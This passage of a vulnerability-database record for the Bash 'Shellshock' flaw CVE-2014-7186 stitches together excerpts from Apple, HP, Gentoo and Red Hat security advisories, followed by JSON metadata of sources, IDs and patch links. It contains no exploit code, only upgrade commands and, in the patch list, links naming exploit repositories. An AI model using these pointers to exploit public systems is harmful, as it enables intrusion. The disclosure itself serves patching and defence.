sensitive user information\nDescription: An issue existed in parsing links in the Notes\napplication. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher\n\nNotes\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to leak sensitive user information\nDescription: A cross-site scripting issue existed in parsing text by\nthe Notes application. This issue was addressed through improved\ninput validation. \nCVE-ID\nCVE-2015-5875 : xisigr of Tencent\u0027s Xuanwu LAB (www.tencent.com)\n\nOpenSSH\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in OpenSSH\nDescription: Multiple vulnerabilities existed in OpenSSH versions\nprior to 6.9. These issues were addressed by updating OpenSSH to\nversion 6.9. \nCVE-ID\nCVE-2014-2532\n\nOpenSSL\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in OpenSSL\nDescription: Multiple vulnerabilities existed in OpenSSL versions\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\n0.9.8zg. \nCVE-ID\nCVE-2015-0286\nCVE-2015-0287\n\nprocmail\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in procmail\nDescription: Multiple vulnerabilities existed in procmail versions\nprior to 3.22. These issues were addressed by removing procmail. \nCVE-ID\nCVE-2014-3618\n\nremote_cmds\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with root\nprivileges\nDescription: An issue existed in the usage of environment variables\nby the rsh binary. This issue was addressed by dropping setuid\nprivileges from the rsh binary. \nCVE-ID\nCVE-2015-5889 : Philip Pettersson\n\nremovefile\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Processing malicious data may lead to unexpected application\ntermination\nDescription: An overflow fault existed in the checkint division\nroutines. This issue was addressed with improved division routines. \nCVE-ID\nCVE-2015-5840 : an anonymous researcher\n\nRuby\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in Ruby\nDescription: Multiple vulnerabilities existed in Ruby versions prior\nto 2.0.0p645. These were addressed by updating Ruby to version\n2.0.0p645. \nCVE-ID\nCVE-2014-8080\nCVE-2014-8090\nCVE-2015-1855\n\nSecurity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: The lock state of the keychain may be incorrectly displayed\nto the user\nDescription: A state management issue existed in the way keychain\nlock status was tracked. This issue was addressed through improved\nstate management. \nCVE-ID\nCVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,\nEric E. Lawrence, Apple\n\nSecurity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A trust evaluation configured to require revocation checking\nmay succeed even if revocation checking fails\nDescription: The kSecRevocationRequirePositiveResponse flag was\nspecified but not implemented. This issue was addressed by\nimplementing the flag. \nCVE-ID\nCVE-2015-5894 : Hannes Oud of kWallet GmbH\n\nSecurity\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A remote server may prompt for a certificate before\nidentifying itself\nDescription: Secure Transport accepted the CertificateRequest\nmessage before the ServerKeyExchange message. This issue was\naddressed by requiring the ServerKeyExchange first. \nCVE-ID\nCVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine\nDelignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of\nINRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of\nMicrosoft Research, Pierre-Yves Strub of IMDEA Software Institute\n\nSMB\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue existed in the kernel. This\nissue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-5891 : Ilja van Sprundel of IOActive\n\nSMB\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An issue existed in SMBClient that led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-5893 : Ilja van Sprundel of IOActive\n\nSQLite\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Multiple vulnerabilities in SQLite v3.8.5\nDescription: Multiple vulnerabilities existed in SQLite v3.8.5. \nThese issues were addressed by updating SQLite to version 3.8.10.2. \nCVE-ID\nCVE-2015-3414\nCVE-2015-3415\nCVE-2015-3416\n\nTelephony\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker can place phone calls without the user\u0027s\nknowledge when using Continuity\nDescription: An issue existed in the authorization checks for\nplacing phone calls. This issue was addressed through improved\nauthorization checks. \nCVE-ID\nCVE-2015-3785 : Dan Bastone of Gotham Digital Science\n\nTerminal\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Maliciously crafted text could mislead the user in Terminal\nDescription: Terminal did not handle bidirectional override\ncharacters in the same way when displaying text and when selecting\ntext. This issue was addressed by suppressing bidirectional override\ncharacters in Terminal. \nCVE-ID\nCVE-2015-5883 : an anonymous researcher\n\ntidy\nAvailable for: Mac OS X v10.6.8 and later\nImpact: Visiting a maliciously crafted website may lead to arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in tidy. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-5522 : Fernando Munoz of NULLGroup.com\nCVE-2015-5523 : Fernando Munoz of NULLGroup.com\n\nTime Machine\nAvailable for: Mac OS X v10.6.8 and later\nImpact: A local attacker may gain access to keychain items\nDescription: An issue existed in backups by the Time Machine\nframework. This issue was addressed through improved coverage of Time\nMachine backups. \nCVE-ID\nCVE-2015-5854 : Jonas Magazinius of Assured AB\n\nNote: OS X El Capitan 10.11 includes the security content of\nSafari 9: https://support.apple.com/kb/HT205265. \n\nOS X El Capitan 10.11 may be obtained from the Mac App Store:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw\nS5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO\n/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6\nQhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54\nYJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop\nhpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O\nc3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR\n8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r\nN1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT\nfJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1\nnJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e\ng6jld/w5tPuCFhGucE7Z\n=XciV\n-----END PGP SIGNATURE-----\n. No other firmware\nstream updates are planned beyond the NX-OS 5.x and 6.x versions listed below\nfor the MDS products. \n\nHP has released and posted the Cisco switch software version NX-OS 6.2(9a) on\nHP Support Center (HPSC). This software versions 6.2(9a) has included the\nfixes for the vulnerability in HP StoreFabric C-series MDS switches which\ncurrently supporting NX-OS 6.X releases. \nHP has released and posted the Cisco switch software version NX-OS 5.2(8e) on\nHP Support Center (HPSC). This software version 5.2(8e) has included the fix\nfor the vulnerability in HP C-series MDS switches which currently supporting\nNX-OS 5.X releases. All MDS and\nNexus 5K switches can function in this configuration. Access is available\nthrough the console port. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201410-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: Bash: Multiple vulnerabilities\n Date: October 04, 2014\n Bugs: #523742, #524256\n ID: 201410-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple parsing flaws in Bash could allow remote attackers to inject\ncode or cause a Denial of Service condition. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 app-shells/bash \u003c 4.2_p52 *\u003e= 3.1_p22\n *\u003e= 3.2_p56\n *\u003e= 4.0_p43\n *\u003e= 4.1_p16\n \u003e= 4.2_p52\n\nDescription\n===========\n\nFlorian Weimer, Todd Sabin, Michal Zalewski et al. discovered further\nparsing flaws in Bash. The unaffected Gentoo packages listed in this\nGLSA contain the official patches to fix the issues tracked as\nCVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the\nofficial patch known as \"function prefix patch\" is included which\nprevents the exploitation of CVE-2014-6278. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Bash 3.1 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-shells/bash-3.1_p22:3.1\"\n\nAll Bash 3.2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-shells/bash-3.2_p56:3.2\"\n\nAll Bash 4.0 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-shells/bash-4.0_p43:4.0\"\n\nAll Bash 4.1 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-shells/bash-4.1_p16:4.1\"\n\nAll Bash 4.2 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=app-shells/bash-4.2_p52\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-6277\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6277\n[ 2 ] CVE-2014-6278\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6278\n[ 3 ] CVE-2014-7186\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7186\n[ 4 ] CVE-2014-7187\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7187\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201410-01.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n\nThis vulnerability allows users that have been granted access to a shell\nscript to escalate privilege and execute unrestricted commands at the same\nsecurity level as the Bash script. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04487573\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04487573\nVersion: 1\n\nHPSBST03155 rev.1 - HP StoreFabric H-series switches running Bash Shell,\nRemote Code Execution\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-11-11\nLast Updated: 2014-11-11\n\nPotential Security Impact: Remote code execution\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP StoreFabric\nH-series switches running Bash Shell. \n\nReferences:\n\n CVE-2014-6271\n CVE-2014-6277\n CVE-2014-6278\n CVE-2014-7169\n CVE-2014-7186\n CVE-2014-7187\n SSRT101747\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nAll HP StoreFabric H-series switches\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP is actively working on a firmware update to resolve the vulnerability in\nHP StoreFabric H-series switches. This bulletin will be revised when the\nupdate is available. \n\n MITIGATION INFORMATION\n\n HP recommends the following steps to reduce the risk of this\nvulnerability:\n\n - Place the HP StoreFabric H-series switch and other data center\ncritical infrastructure behind a firewall to disallow access from the\nInternet. \n - Change all HP StoreFabric switch default account passwords, including\nthe root passwords, from the default factory passwords. \n - Examine the list of accounts, including ones on the switch and those\nexisting on remote authentication servers such as RADIUS, LDAP, and TACAS+,\nto ensure only necessary personnel can gain access to HP StoreFabric H-series\nswitches. Delete guest accounts and temporary accounts created for one-time\nusage needs. \n - To avoid possible exploit through the embedded web GUI, QuickTools,\ndisable the web server with the following procedure:\n\n NOTE: After completing this procedure, the user will not be able to\nmanage the switch using QuickTools. Login to the Command Line Interface (CLI). Execute the \"admin start\" command to enter into an admin session. Execute the \"set setup services\" command and change setting for\nEmbeddedGUIEnabled to \"False\". \n\nHISTORY\nVersion:1 (rev.1) - 11 November 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \n\n Note: HP and the switch vendor recommend running an active version of\nFabric OS (FOS) listed on the HP Single Point of Connectivity Knowledge\n(SPOCK) website ( http://h20272.www2.hp.com/ ) and applying the work-around\ninformation provided in the MITIGATION INFORMATION section below to protect\nHP StoreFabric B-series switches from this vulnerability. \n - Utilize FOS password policy management to strengthen the complexity,\nage, and history requirements of switch account passwords. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: rhev-hypervisor6 security update\nAdvisory ID: RHSA-2014:1354-01\nProduct: Red Hat Enterprise Virtualization\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1354.html\nIssue date: 2014-10-02\nCVE Names: CVE-2014-1568 CVE-2014-6271 CVE-2014-7169 \n CVE-2014-7186 CVE-2014-7187 \n=====================================================================\n\n1. Summary:\n\nAn updated rhev-hypervisor6 package that fixes several security issues is\nnow available. \n\nRed Hat Product Security has rated this update as having Critical security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRHEV-M 3.4 - noarch\n\n3. Description:\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent. \n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions. \n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain services\nand applications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue. (CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)\ninput from certain RSA signatures. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and possibly\nleading to arbitrary code execution when evaluating untrusted input that\nwould not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,\nand the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges\nAntoine Delignat-Lavaud and Intel Product Security Incident Response Team\nas the original reporters of CVE-2014-1568. \n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package. Package List:\n\nRHEV-M 3.4:\n\nSource:\nrhev-hypervisor6-6.5-20140930.1.el6ev.src.rpm\n\nnoarch:\nrhev-hypervisor6-6.5-20140930.1.el6ev.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-1568.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-6271.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7169.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7186.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-7187.html\nhttps://access.redhat.com/security/updates/classification/#critical\n\n8", "sources": [ { "db": "NVD", "id": "CVE-2014-7186" }, { "db": "CERT/CC", "id": "VU#252743" }, { "db": "BID", "id": "70152" }, { "db": "PACKETSTORM", "id": "128716" }, { "db": "PACKETSTORM", "id": "128458" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128567" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "129067" }, { "db": "VULMON", "id": "CVE-2014-7186" }, { "db": "PACKETSTORM", "id": "129070" }, { "db": "PACKETSTORM", "id": "133803" }, { "db": "PACKETSTORM", "id": "129438" }, { "db": "PACKETSTORM", "id": "128563" }, { "db": "PACKETSTORM", "id": "128762" }, { "db": "PACKETSTORM", "id": "129073" }, { "db": "PACKETSTORM", "id": "128760" }, { "db": "PACKETSTORM", "id": "128537" } ], "trust": 3.24 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=36933", "trust": 0.2, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7186" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-7186", "trust": 3.4 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/09/28/10", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/09/26/2", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/09/25/32", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10085", "trust": 1.4 }, { "db": "JUNIPER", "id": "JSA10648", "trust": 1.4 }, { "db": "CERT/CC", "id": "VU#252743", "trust": 1.2 }, { "db": "PACKETSTORM", "id": "128567", "trust": 1.2 }, { "db": "SECUNIA", "id": "61065", "trust": 1.1 }, { "db": "SECUNIA", "id": "61622", "trust": 1.1 }, { "db": "SECUNIA", "id": "61780", "trust": 1.1 }, { "db": "SECUNIA", "id": "61603", "trust": 1.1 }, { "db": "SECUNIA", "id": "61287", "trust": 1.1 }, { "db": "SECUNIA", "id": "61643", "trust": 1.1 }, { "db": "SECUNIA", "id": "61618", "trust": 1.1 }, { "db": "SECUNIA", "id": "60433", "trust": 1.1 }, { "db": "SECUNIA", "id": "61188", "trust": 1.1 }, { "db": "SECUNIA", "id": "61565", "trust": 1.1 }, { "db": "SECUNIA", "id": "61312", "trust": 1.1 }, { "db": "SECUNIA", "id": "61703", "trust": 1.1 }, { "db": "SECUNIA", "id": "61503", "trust": 1.1 }, { "db": "SECUNIA", "id": "61479", "trust": 1.1 }, { "db": "SECUNIA", "id": "62228", "trust": 1.1 }, { "db": "SECUNIA", "id": "60034", "trust": 1.1 }, { "db": "SECUNIA", "id": "60044", "trust": 1.1 }, { "db": "SECUNIA", "id": "61328", "trust": 1.1 }, { "db": "SECUNIA", "id": "59907", "trust": 1.1 }, { "db": "SECUNIA", "id": "61129", "trust": 1.1 }, { "db": "SECUNIA", "id": "60024", "trust": 1.1 }, { "db": "SECUNIA", "id": "61633", "trust": 1.1 }, { "db": "SECUNIA", "id": "61128", "trust": 1.1 }, { "db": "SECUNIA", "id": "61313", "trust": 1.1 }, { "db": "SECUNIA", "id": "60055", "trust": 1.1 }, { "db": "SECUNIA", "id": "61291", "trust": 1.1 }, { "db": "SECUNIA", "id": "62343", "trust": 1.1 }, { "db": "SECUNIA", "id": "61641", "trust": 1.1 }, { "db": "SECUNIA", "id": "61816", "trust": 1.1 }, { "db": "SECUNIA", "id": "62312", "trust": 1.1 }, { "db": "SECUNIA", "id": "60193", "trust": 1.1 }, { "db": "SECUNIA", "id": "60063", "trust": 1.1 }, { "db": "SECUNIA", "id": "61873", "trust": 1.1 }, { "db": "SECUNIA", "id": "58200", "trust": 1.1 }, { "db": "SECUNIA", "id": "61711", "trust": 1.1 }, { "db": "SECUNIA", "id": "61636", "trust": 1.1 }, { "db": "SECUNIA", "id": "61654", "trust": 1.1 }, { "db": "SECUNIA", "id": "61550", "trust": 1.1 }, { "db": "SECUNIA", "id": "61283", "trust": 1.1 }, { "db": "SECUNIA", "id": "61485", "trust": 1.1 }, { "db": "SECUNIA", "id": "61471", "trust": 1.1 }, { "db": "SECUNIA", "id": "61442", "trust": 1.1 }, { "db": "SECUNIA", "id": "61552", "trust": 1.1 }, { "db": "PACKETSTORM", "id": "128517", "trust": 1.1 }, { "db": "JVN", "id": "JVN55667175", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2014-000126", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-201409-1072", "trust": 0.6 }, { "db": "BID", "id": "70152", "trust": 0.4 }, { "db": "JUNIPER", "id": "JSA10661", "trust": 0.3 }, { "db": "EXPLOIT-DB", "id": "36933", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-7186", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128716", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128458", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130988", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129069", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129067", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128537", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129070", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129438", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128563", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128762", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129073", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128760", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7186" }, { "db": "BID", "id": "70152" }, { "db": "PACKETSTORM", "id": "128716" }, { "db": "PACKETSTORM", "id": "128458" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128567" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "129067" }, { "db": "PACKETSTORM", "id": "128537" }, { "db": "PACKETSTORM", "id": "129070" }, { "db": "PACKETSTORM", "id": "133803" }, { "db": "PACKETSTORM", "id": "129438" }, { "db": "PACKETSTORM", "id": "128563" }, { "db": "PACKETSTORM", "id": "128762" }, { "db": "PACKETSTORM", "id": "129073" }, { "db": "PACKETSTORM", "id": "128760" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "db": "NVD", "id": "CVE-2014-7186" } ] }, "id": "VAR-201409-1147", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4019157454999999 }, "last_update_date": "2024-07-23T20:16:26.490000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "bash4.1.2-15.el6_5.2.x86_64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=54163" }, { "title": "bash-4.2-cve-2014-7169-2", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=54162" }, { "title": "Ubuntu Security Notice: bash vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2364-1" }, { "title": "Red Hat: CVE-2014-7186", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-7186" }, { "title": "Amazon Linux AMI: ALAS-2014-419", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-419" }, { "title": "VMware Security Advisories: VMware product updates address critical Bash security vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=86cb6b3955e100fdc9667a7ca916c772" }, { "title": "Symantec Security Advisories: SA82 : GNU Bash Shellshock Command Injection Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=2b57ceaadfde2a8b03482273e1fd21ea" }, { "title": "Apple: OS X Yosemite v10.10.2 and Security Update 2015-001", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=64cbe709a7be49c91d8a8b0f43621640" }, { "title": "Tenable Security Advisories: [R7] Tenable Appliance Affected by GNU bash \u0027Shellshock\u0027 Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-07" }, { "title": "Citrix Security Bulletins: Citrix XenServer Shellshock Security Update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=64ae0aae8269062686789e3a3fa1d2bf" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for GNU Bash Shellshock Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=73443a6db89dc66fc6bcb49f85bfd1ab" }, { "title": "Apple: OS X El Capitan v10.11", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=e88bab658248444f5dffc23fd95859e7" }, { "title": "Shell-Shock-Update", "trust": 0.1, "url": "https://github.com/umdterps/shell-shock-update " }, { "title": "exploit-CVE-2014-6271", "trust": 0.1, "url": "https://github.com/opsxcq/exploit-cve-2014-6271 " }, { "title": "dokku-alt", "trust": 0.1, "url": "https://github.com/dokku-alt/dokku-alt " }, { "title": "Pentest-In-Docker", "trust": 0.1, "url": "https://github.com/swordfish-security/pentest-in-docker " }, { "title": "fabric-shellshock", "trust": 0.1, "url": "https://github.com/ericlake/fabric-shellshock " }, { "title": "patch-bash-shellshock", "trust": 